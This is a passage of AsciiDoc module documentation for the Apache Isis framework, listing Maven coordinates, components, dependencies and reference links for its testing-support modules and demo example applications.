isis-testing-fixtures\nType: pom\nDirectory: \/testing\/fixtures\n----\n|Library to initialize the system under test, either for integration testing or for prototyping.\n\n|Apache Isis Tst - Fixtures (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fixtures-applib\nType: jar\nDirectory: \/testing\/fixtures\/applib\n----\n|.Components\n****\no.a.i.testing.fixtures.applib.fixturescripts.ExecutionParametersService +\no.a.i.testing.fixtures.applib.modules.ModuleWithFixturesService +\no.a.i.testing.fixtures.applib.queryresultscache.QueryResultsCacheControlDefault +\no.a.i.testing.fixtures.applib.services.FixturesLifecycleService +\n****\n\n.Dependencies\n****\njoda-time:joda-time:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-applib:jar:<managed> +\norg.apache.isis.subdomains:isis-subdomains-spring-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\n****\n\n|Apache Isis Tst - H2 Console (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-h2console\nType: pom\nDirectory: \/testing\/h2console\n----\n|Menu and configuration to open up H2 Console\n\n|Apache Isis Tst - H2 Console (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-h2console-ui\nType: jar\nDirectory: \/testing\/h2console\/ui\n----\n|.Components\n****\no.a.i.testing.h2console.ui.webmodule.WebModuleH2Console +\n****\n\n.Dependencies\n****\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/h2console\/ui\/IsisModuleTestingH2ConsoleUi.adoc[IsisModuleTestingH2ConsoleUi], xref:refguide:testing:index\/h2console\/ui\/services\/H2ManagerMenu.adoc[H2ManagerMenu], xref:refguide:testing:index\/h2console\/ui\/webmodule\/WebModuleH2Console.adoc[WebModuleH2Console]\n****\n\n|Apache Isis Tst - HSQLDB Manager (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-hsqldbmgr\nType: pom\nDirectory: \/testing\/hsqldbmgr\n----\n|Menu and configuration to open up HSQLDB Manager\n\n|Apache Isis Tst - HSQLDB Manager\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-hsqldbmgr-ui\nType: jar\nDirectory: \/testing\/hsqldbmgr\/ui\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.hsqldb:hsqldb:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/hsqldbmgr\/dom\/IsisModuleExtHsqldbMgr.adoc[IsisModuleExtHsqldbMgr], xref:refguide:extensions:index\/hsqldbmgr\/dom\/services\/HsqlDbManagerMenu.adoc[HsqlDbManagerMenu]\n****\n\n|Apache Isis Tst - Integ Test Support (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-integtestsupport\nType: pom\nDirectory: \/testing\/integtestsupport\n----\n|Support for writing integ tests in JUnit 5; should be added as a dependency with scope=test only\n\n|Apache Isis Tst - Integ Test Support (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-integtestsupport-applib\nType: jar\nDirectory: \/testing\/integtestsupport\/applib\n----\n|.Components\n****\no.a.i.testing.integtestsupport.applib.IsisIntegrationTestAbstract$InteractionSupport +\n****\n\n.Dependencies\n****\ncom.approvaltests:approvaltests:jar:<managed> +\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.security:isis-security-bypass:jar:<managed> +\norg.hamcrest:hamcrest-library:jar:<managed> +\norg.hsqldb:hsqldb:jar:<managed> +\norg.slf4j:slf4j-api:jar:${slf4j-api.version} +\norg.springframework:spring-test:jar:<managed> +\norg.springframework.boot:spring-boot-starter-test:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/integtestsupport\/applib\/ExceptionRecognizerTranslate.adoc[ExceptionRecognizerTranslate], xref:refguide:testing:index\/integtestsupport\/applib\/IsisIntegrationTestAbstract.adoc[IsisIntegrationTestAbstract], xref:refguide:testing:index\/integtestsupport\/applib\/IsisInteractionHandler.adoc[IsisInteractionHandler], xref:refguide:testing:index\/integtestsupport\/applib\/ThrowableMatchers.adoc[ThrowableMatchers], xref:refguide:testing:index\/integtestsupport\/applib\/swagger\/SwaggerExporter.adoc[SwaggerExporter], xref:refguide:testing:index\/integtestsupport\/applib\/validate\/DomainModelValidator.adoc[DomainModelValidator]\n****\n\n|Apache Isis Tst - Spec\/Cucumber (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-specsupport\nType: pom\nDirectory: \/testing\/specsupport\n----\n|Allows Cucumber to be used to write BDD-style specifications, generally as an alternative to integration tests.\n\n|Apache Isis Tst - Spec\/Cucumber (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-specsupport-applib\nType: jar\nDirectory: \/testing\/specsupport\/applib\n----\n|.Dependencies\n****\nio.cucumber:cucumber-java:jar:<managed> +\nio.cucumber:cucumber-junit-platform-engine:jar:<managed> +\nio.cucumber:cucumber-spring:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/specsupport\/applib\/IsisModuleTestingSpecSupportApplib.adoc[IsisModuleTestingSpecSupportApplib], xref:refguide:testing:index\/specsupport\/applib\/integration\/ObjectFactoryForIntegration.adoc[ObjectFactoryForIntegration], xref:refguide:testing:index\/specsupport\/applib\/specs\/V.adoc[V]\n****\n\n|Apache Isis Tst - Unit Test Support (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-unittestsupport\nType: pom\nDirectory: \/testing\/unittestsupport\n----\n|A module providing test utilities for unit testing of domain modules\n\n|Apache Isis Tst - Unit Test Support (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-unittestsupport-applib\nType: jar\nDirectory: \/testing\/unittestsupport\/applib\n----\n|.Dependencies\n****\ncom.approvaltests:approvaltests:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-codegen-bytebuddy:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\norg.jmock:jmock:jar:<managed> +\norg.jmock:jmock-junit4:jar:<managed> +\norg.picocontainer:picocontainer:jar:<managed> +\norg.slf4j:slf4j-api:jar:<managed> +\norg.springframework:spring-test:jar:<managed> +\norg.springframework.boot:spring-boot-starter-test:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/unittestsupport\/applib\/IsisModuleTestingUnitTestSupportApplib.adoc[IsisModuleTestingUnitTestSupportApplib], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/AbstractBeanPropertiesTest.adoc[AbstractBeanPropertiesTest], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/FixtureDatumFactoriesForAnyPojo.adoc[FixtureDatumFactoriesForAnyPojo], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/FixtureDatumFactoriesForApplib.adoc[FixtureDatumFactoriesForApplib], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/FixtureDatumFactoriesForJoda.adoc[FixtureDatumFactoriesForJoda], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/FixtureDatumFactoriesForTime.adoc[FixtureDatumFactoriesForTime], xref:refguide:testing:index\/unittestsupport\/applib\/bean\/PojoTester.adoc[PojoTester], xref:refguide:testing:index\/unittestsupport\/applib\/core\/AbstractApplyToAllContractTest.adoc[AbstractApplyToAllContractTest], xref:refguide:testing:index\/unittestsupport\/applib\/core\/bidir\/BidirectionalRelationshipContractTestAbstract.adoc[BidirectionalRelationshipContractTestAbstract], xref:refguide:testing:index\/unittestsupport\/applib\/core\/bidir\/Instantiator.adoc[Instantiator], xref:refguide:testing:index\/unittestsupport\/applib\/core\/bidir\/InstantiatorSimple.adoc[InstantiatorSimple], xref:refguide:testing:index\/unittestsupport\/applib\/core\/bidir\/Instantiators.adoc[Instantiators], xref:refguide:testing:index\/unittestsupport\/applib\/core\/comparable\/ComparableContractTest_compareTo.adoc[ComparableContractTest_compareTo], xref:refguide:testing:index\/unittestsupport\/applib\/core\/comparable\/ComparableContractTester.adoc[ComparableContractTester], xref:refguide:testing:index\/unittestsupport\/applib\/core\/files\/Files.adoc[Files], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jaxb\/JaxbMatchers.adoc[JaxbMatchers], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/Imposterisers.adoc[Imposterisers], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/InjectIntoJMockAction.adoc[InjectIntoJMockAction], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/IsisActions.adoc[IsisActions], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/JMockActions.adoc[JMockActions], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/JUnitRuleMockery2.adoc[JUnitRuleMockery2], xref:refguide:testing:index\/unittestsupport\/applib\/core\/jmocking\/PostponedAction.adoc[PostponedAction], xref:refguide:testing:index\/unittestsupport\/applib\/core\/soap\/SoapEndpointPublishingRule.adoc[SoapEndpointPublishingRule], xref:refguide:testing:index\/unittestsupport\/applib\/core\/soap\/SoapEndpointSpec.adoc[SoapEndpointSpec], xref:refguide:testing:index\/unittestsupport\/applib\/core\/sortedsets\/SortedSetsContractTestAbstract.adoc[SortedSetsContractTestAbstract], xref:refguide:testing:index\/unittestsupport\/applib\/core\/streams\/NullPrintStream.adoc[NullPrintStream], xref:refguide:testing:index\/unittestsupport\/applib\/core\/utils\/CollectUtils.adoc[CollectUtils], xref:refguide:testing:index\/unittestsupport\/applib\/core\/utils\/IndentPrinter.adoc[IndentPrinter], xref:refguide:testing:index\/unittestsupport\/applib\/core\/utils\/ReflectUtils.adoc[ReflectUtils], xref:refguide:testing:index\/unittestsupport\/applib\/core\/utils\/StringUtils.adoc[StringUtils], xref:refguide:testing:index\/unittestsupport\/applib\/core\/value\/ValueTypeContractTestAbstract.adoc[ValueTypeContractTestAbstract], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/assertions\/Asserting.adoc[Asserting], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/matchers\/IsisMatchers.adoc[IsisMatchers], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/privatecons\/PrivateConstructorTester.adoc[PrivateConstructorTester], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/reflect\/ReflectUtils.adoc[ReflectUtils], xref:refguide:testing:index\/unittestsupport\/applib\/dom\/repo\/FinderInteraction.adoc[FinderInteraction]\n****\n|===\n\n== Examples\n\n[plantuml,Examples,svg]\n----\n@startuml(id=Examples)\ntitle Examples - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Examples\\n[Software System]\" {\n rectangle \"==Demo - Domain\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Demo - JavaFX\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Demo - Parent\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Demo - Vaadin\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Demo - Web\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Demo - Wicket\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n@enduml\n----\n.Projects\/Modules (Examples)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Demo - Parent\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-parent\nType: pom\nDirectory: \/examples\/demo\n----\n|.Dependencies\n****\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-exceldownload-ui:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-modelannotation:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-encryption-jbcrypt:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-persistence-jdo:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-shiro-realm:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdk11:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-persistence-jdo-dn5:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-persistence-jdo-dn5:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-sse-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Demo - Domain\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-domain\nType: jar\nDirectory: \/examples\/demo\/domain\n----\n|.Components\n****\ndemoapp.dom.AppConfiguration +\ndemoapp.dom._infra.DefaultTitleProvider +\ndemoapp.dom._infra.LibraryPreloadingService +\ndemoapp.dom._infra.fixtures.DemoFixtureScriptSpecificationProvider +\ndemoapp.dom._infra.resources.AsciiDocConverterService +\ndemoapp.dom._infra.resources.AsciiDocReaderService +\ndemoapp.dom._infra.resources.MarkdownReaderService +\ndemoapp.dom._infra.resources.MarkupReaderService +\ndemoapp.dom._infra.resources.MarkupVariableResolverService +\ndemoapp.dom._infra.resources.ResourceReaderService +\ndemoapp.dom._infra.samples.NameSamples +\ndemoapp.dom._infra.urlencoding.UrlEncodingServiceNaiveInMemory +\ndemoapp.dom.domain._changes.EntityChangesSubscriberToCaptureChangesInMemory +\ndemoapp.dom.domain._commands.ExposePersistedCommands$TableColumnOrderDefault +\ndemoapp.dom.domain._interactions.ExecutionListenerToCaptureInteractionsInMemory +\ndemoapp.dom.domain.actions.Action.commandPublishing.ActionCommandPublishingJdoEntities +\ndemoapp.dom.domain.actions.Action.commandPublishing.ActionCommandPublishingJdoSeedService +\ndemoapp.dom.domain.actions.Action.executionPublishing.ActionExecutionPublishingJdoEntities +\ndemoapp.dom.domain.actions.Action.executionPublishing.ActionExecutionPublishingJdoSeedService +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.annotated.disabled.DomainObjectEntityChangePublishingDisabledJdoEntities +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.annotated.disabled.DomainObjectEntityChangePublishingDisabledJdoSeedService +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.annotated.enabled.DomainObjectAuditingEnabledJdoEntities +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.annotated.enabled.DomainObjectAuditingEnabledJdoSeedService +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.metaAnnot.enabled.DomainObjectEntityChangePublishingEnabledMetaAnnotatedJdoEntities +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.metaAnnot.enabled.DomainObjectEntityChangePublishingEnabledMetaAnnotatedJdoSeedService +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.metaAnnotOverridden.enabled.DomainObjectEntityChangePublishingEnabledMetaAnnotOverriddenJdoEntities +\ndemoapp.dom.domain.objects.DomainObject.entityChangePublishing.metaAnnotOverridden.enabled.DomainObjectEntityChangePublishingEnabledMetaAnnotOverriddenJdoSeedService +\ndemoapp.dom.domain.objects.DomainObject.nature.viewmodels.jaxbrefentity.ChildJdoEntities +\ndemoapp.dom.domain.objects.DomainObject.nature.viewmodels.jaxbrefentity.seed.ChildJdoSeedService +\ndemoapp.dom.domain.objects.other.embedded.NumberConstantJdoRepository +\ndemoapp.dom.domain.properties.Property.commandPublishing.PropertyCommandPublishingJdoEntities +\ndemoapp.dom.domain.properties.Property.commandPublishing.PropertyCommandPublishingJdoSeedService +\ndemoapp.dom.domain.properties.Property.executionPublishing.PropertyExecutionPublishingJdoEntities +\ndemoapp.dom.domain.properties.Property.executionPublishing.PropertyExecutionPublishingJdoSeedService +\ndemoapp.dom.domain.properties.Property.projecting.jdo.PropertyProjectingChildJdoEntities +\ndemoapp.dom.domain.properties.Property.projecting.jdo.PropertyProjectingChildJdoSeedService +\ndemoapp.dom.domain.properties.PropertyLayout.navigable.FileTreeNodeService +\ndemoapp.dom.domain.properties.PropertyLayout.repainting.PdfJsViewerAdvisorFallback +\ndemoapp.dom.featured.customui.geocoding.GeoapifyClient +\ndemoapp.dom.services.core.errorreportingservice.ErrorReportingServiceDemoImplementation +\ndemoapp.dom.services.core.eventbusservice.EventLogEntryJdoRepository +\ndemoapp.dom.services.core.eventbusservice.EventSubscriberDemoImplementation +\ndemoapp.dom.services.core.wrapperFactory.WrapperFactoryJdoEntities +\ndemoapp.dom.services.core.wrapperFactory.WrapperFactoryJdoSeedService +\ndemoapp.dom.services.extensions.secman.apptenancy.ApplicationTenancyEvaluatorForDemo +\ndemoapp.dom.services.extensions.secman.apptenancy.entities.TenantedJdoEntities +\ndemoapp.dom.services.extensions.secman.apptenancy.entities.seed.TenantedJdoSeedService +\ndemoapp.dom.types.isis.blobs.jdo.IsisBlobJdoEntities +\ndemoapp.dom.types.isis.blobs.jdo.IsisBlobJdoSeedService +\ndemoapp.dom.types.isis.blobs.samples.IsisBlobsSamples +\ndemoapp.dom.types.isis.clobs.jdo.IsisClobJdoEntities +\ndemoapp.dom.types.isis.clobs.jdo.IsisClobJdoSeedService +\ndemoapp.dom.types.isis.clobs.samples.IsisClobsSamples +\ndemoapp.dom.types.isis.localresourcepaths.jdo.IsisLocalResourcePathJdoEntities +\ndemoapp.dom.types.isis.localresourcepaths.jdo.IsisLocalResourcePathJdoSeedService +\ndemoapp.dom.types.isis.localresourcepaths.samples.IsisLocalResourcePathsSamples +\ndemoapp.dom.types.isis.markups.jdo.IsisMarkupJdoEntities +\ndemoapp.dom.types.isis.markups.jdo.IsisMarkupJdoSeedService +\ndemoapp.dom.types.isis.markups.samples.IsisMarkupSamples +\ndemoapp.dom.types.isis.passwords.jdo.IsisPasswordJdoEntities +\ndemoapp.dom.types.isis.passwords.jdo.IsisPasswordJdoSeedService +\ndemoapp.dom.types.isis.passwords.samples.IsisPasswordsSamples +\ndemoapp.dom.types.isisext.asciidocs.jdo.IsisAsciiDocJdoEntities +\ndemoapp.dom.types.isisext.asciidocs.jdo.IsisAsciiDocJdoSeedService +\ndemoapp.dom.types.isisext.asciidocs.samples.IsisAsciiDocSamples +\ndemoapp.dom.types.isisext.markdowns.jdo.IsisMarkdownJdoEntities +\ndemoapp.dom.types.isisext.markdowns.jdo.IsisMarkdownJdoSeedService +\ndemoapp.dom.types.isisext.markdowns.samples.IsisMarkdownSamples +\ndemoapp.dom.types.javaawt.images.jdo.JavaAwtImageJdoEntities +\ndemoapp.dom.types.javaawt.images.jdo.JavaAwtImageJdoSeedService +\ndemoapp.dom.types.javaawt.images.samples.JavaAwtImageService +\ndemoapp.dom.types.javaawt.images.samples.JavaAwtImagesSamples +\ndemoapp.dom.types.javalang.booleans.jdo.WrapperBooleanJdoEntities +\ndemoapp.dom.types.javalang.booleans.jdo.WrapperBooleanJdoSeedService +\ndemoapp.dom.types.javalang.booleans.samples.WrapperBooleanSamples +\ndemoapp.dom.types.javalang.bytes.jdo.WrapperByteJdoEntities +\ndemoapp.dom.types.javalang.bytes.jdo.WrapperByteJdoSeedService +\ndemoapp.dom.types.javalang.bytes.samples.WrapperByteSamples +\ndemoapp.dom.types.javalang.characters.jdo.WrapperCharacterJdoEntities +\ndemoapp.dom.types.javalang.characters.jdo.WrapperCharacterJdoSeedService +\ndemoapp.dom.types.javalang.characters.samples.WrapperCharacterSamples +\ndemoapp.dom.types.javalang.doubles.jdo.WrapperDoubleJdoEntities +\ndemoapp.dom.types.javalang.doubles.jdo.WrapperDoubleJdoSeedService +\ndemoapp.dom.types.javalang.doubles.samples.WrapperDoubleSamples +\ndemoapp.dom.types.javalang.floats.jdo.WrapperFloatJdoEntities +\ndemoapp.dom.types.javalang.floats.jdo.WrapperFloatJdoSeedService +\ndemoapp.dom.types.javalang.floats.samples.WrapperFloatSamples +\ndemoapp.dom.types.javalang.integers.jdo.WrapperIntegerJdoEntities +\ndemoapp.dom.types.javalang.integers.jdo.WrapperIntegerJdoSeedService +\ndemoapp.dom.types.javalang.integers.samples.WrapperIntegerSamples +\ndemoapp.dom.types.javalang.longs.jdo.WrapperLongJdoEntities +\ndemoapp.dom.types.javalang.longs.jdo.WrapperLongJdoSeedService +\ndemoapp.dom.types.javalang.longs.samples.WrapperLongSamples +\ndemoapp.dom.types.javalang.shorts.jdo.WrapperShortJdoEntities +\ndemoapp.dom.types.javalang.shorts.jdo.WrapperShortJdoSeedService +\ndemoapp.dom.types.javalang.shorts.samples.WrapperShortSamples +\ndemoapp.dom.types.javalang.strings.jdo.JavaLangStringJdoEntities +\ndemoapp.dom.types.javalang.strings.jdo.JavaLangStringJdoSeedService +\ndemoapp.dom.types.javalang.strings.samples.JavaLangStringSamples +\ndemoapp.dom.types.javamath.bigdecimals.jdo.JavaMathBigDecimalJdoEntities +\ndemoapp.dom.types.javamath.bigdecimals.jdo.JavaMathBigDecimalJdoSeedService +\ndemoapp.dom.types.javamath.bigdecimals.samples.JavaMathBigDecimalSamples +\ndemoapp.dom.types.javamath.bigintegers.jdo.JavaMathBigIntegerJdoEntities +\ndemoapp.dom.types.javamath.bigintegers.jdo.JavaMathBigIntegerJdoSeedService +\ndemoapp.dom.types.javamath.bigintegers.samples.JavaMathBigIntegerSamples +\ndemoapp.dom.types.javanet.urls.jdo.JavaNetUrlJdoEntities +\ndemoapp.dom.types.javanet.urls.jdo.JavaNetUrlJdoSeedService +\ndemoapp.dom.types.javanet.urls.samples.JavaNetUrlSamples +\ndemoapp.dom.types.javasql.javasqldate.jdo.JavaSqlDateJdoEntities +\ndemoapp.dom.types.javasql.javasqldate.jdo.JavaSqlDateJdoSeedService +\ndemoapp.dom.types.javasql.javasqldate.samples.JavaSqlDateSamples +\ndemoapp.dom.types.javasql.javasqltimestamp.jdo.JavaSqlTimestampJdoEntities +\ndemoapp.dom.types.javasql.javasqltimestamp.jdo.JavaSqlTimestampJdoSeedService +\ndemoapp.dom.types.javasql.javasqltimestamp.samples.JavaSqlTimestampSamples +\ndemoapp.dom.types.javatime.javatimelocaldate.jdo.JavaTimeLocalDateJdoEntities +\ndemoapp.dom.types.javatime.javatimelocaldate.jdo.JavaTimeLocalDateJdoSeedService +\ndemoapp.dom.types.javatime.javatimelocaldate.samples.JavaTimeLocalDateSamples +\ndemoapp.dom.types.javatime.javatimelocaldatetime.jdo.JavaTimeLocalDateTimeJdoEntities +\ndemoapp.dom.types.javatime.javatimelocaldatetime.jdo.JavaTimeLocalDateTimeJdoSeedService +\ndemoapp.dom.types.javatime.javatimelocaldatetime.samples.JavaTimeLocalDateTimeSamples +\ndemoapp.dom.types.javatime.javatimeoffsetdatetime.jdo.JavaTimeOffsetDateTimeJdoEntities +\ndemoapp.dom.types.javatime.javatimeoffsetdatetime.jdo.JavaTimeOffsetDateTimeJdoSeedService +\ndemoapp.dom.types.javatime.javatimeoffsetdatetime.samples.JavaTimeOffsetDateTimeSamples +\ndemoapp.dom.types.javatime.javatimeoffsettime.jdo.JavaTimeOffsetTimeJdoEntities +\ndemoapp.dom.types.javatime.javatimeoffsettime.jdo.JavaTimeOffsetTimeJdoSeedService +\ndemoapp.dom.types.javatime.javatimeoffsettime.samples.JavaTimeOffsetTimeSamples +\ndemoapp.dom.types.javatime.javatimezoneddatetime.jdo.JavaTimeZonedDateTimeJdoEntities +\ndemoapp.dom.types.javatime.javatimezoneddatetime.jdo.JavaTimeZonedDateTimeJdoSeedService +\ndemoapp.dom.types.javatime.javatimezoneddatetime.samples.JavaTimeZonedDateTimeSamples +\ndemoapp.dom.types.javautil.javautildate.jdo.JavaUtilDateJdoEntities +\ndemoapp.dom.types.javautil.javautildate.jdo.JavaUtilDateJdoSeedService +\ndemoapp.dom.types.javautil.javautildate.samples.JavaUtilDateSamples +\ndemoapp.dom.types.javautil.uuids.jdo.JavaUtilUuidJdoEntities +\ndemoapp.dom.types.javautil.uuids.jdo.JavaUtilUuidJdoSeedService +\ndemoapp.dom.types.javautil.uuids.samples.JavaUtilUuidSamples +\ndemoapp.dom.types.jodatime.jodadatetime.jdo.JodaDateTimeJdoEntities +\ndemoapp.dom.types.jodatime.jodadatetime.jdo.JodaDateTimeJdoSeedService +\ndemoapp.dom.types.jodatime.jodadatetime.samples.JodaDateTimeSamples +\ndemoapp.dom.types.jodatime.jodalocaldate.jdo.JodaLocalDateJdoEntities +\ndemoapp.dom.types.jodatime.jodalocaldate.jdo.JodaLocalDateJdoSeedService +\ndemoapp.dom.types.jodatime.jodalocaldate.samples.JodaLocalDateSamples +\ndemoapp.dom.types.jodatime.jodalocaldatetime.jdo.JodaLocalDateTimeJdoEntities +\ndemoapp.dom.types.jodatime.jodalocaldatetime.jdo.JodaLocalDateTimeJdoSeedService +\ndemoapp.dom.types.jodatime.jodalocaldatetime.samples.JodaLocalDateTimeSamples +\ndemoapp.dom.types.primitive.booleans.jdo.PrimitiveBooleanJdoEntities +\ndemoapp.dom.types.primitive.booleans.jdo.PrimitiveBooleanJdoSeedService +\ndemoapp.dom.types.primitive.bytes.jdo.PrimitiveByteJdoEntities +\ndemoapp.dom.types.primitive.bytes.jdo.PrimitiveByteJdoSeedService +\ndemoapp.dom.types.primitive.chars.jdo.PrimitiveCharJdoEntities +\ndemoapp.dom.types.primitive.chars.jdo.PrimitiveCharJdoSeedService +\ndemoapp.dom.types.primitive.doubles.jdo.PrimitiveDoubleJdoEntities +\ndemoapp.dom.types.primitive.doubles.jdo.PrimitiveDoubleJdoSeedService +\ndemoapp.dom.types.primitive.floats.jdo.PrimitiveFloatJdoEntities +\ndemoapp.dom.types.primitive.floats.jdo.PrimitiveFloatJdoSeedService +\ndemoapp.dom.types.primitive.ints.jdo.PrimitiveIntJdoEntities +\ndemoapp.dom.types.primitive.ints.jdo.PrimitiveIntJdoSeedService +\ndemoapp.dom.types.primitive.longs.jdo.PrimitiveLongJdoEntities +\ndemoapp.dom.types.primitive.longs.jdo.PrimitiveLongJdoSeedService +\ndemoapp.dom.types.primitive.shorts.jdo.PrimitiveShortJdoEntities +\ndemoapp.dom.types.primitive.shorts.jdo.PrimitiveShortJdoSeedService +\n****\n\n.Dependencies\n****\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-command-log-jdo:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-exceldownload-ui:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-modelannotation:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-pdfjs-applib:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-encryption-jbcrypt:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-persistence-jdo:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-shiro-realm:jar:<managed> +\norg.apache.isis.testing:isis-testing-h2console-ui:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\norg.assertj:assertj-core:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\norg.springframework.boot:spring-boot-configuration-processor:jar:<managed> +\n****\n\n|Demo - JavaFX\n[source,yaml]\n----\nGroup: org.apache.isis.examples.apps\nArtifact: demo-javafx\nType: jar\nDirectory: \/examples\/demo\/javafx\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\norg.apache.isis.examples.apps:demo-domain:jar:${project.version} +\norg.apache.isis.incubator.viewer:isis-viewer-javafx-viewer:jar:${project.version} +\norg.apache.isis.mavendeps:isis-mavendeps-integtests:pom:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdk11:pom:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.security:isis-security-bypass:jar:<managed> 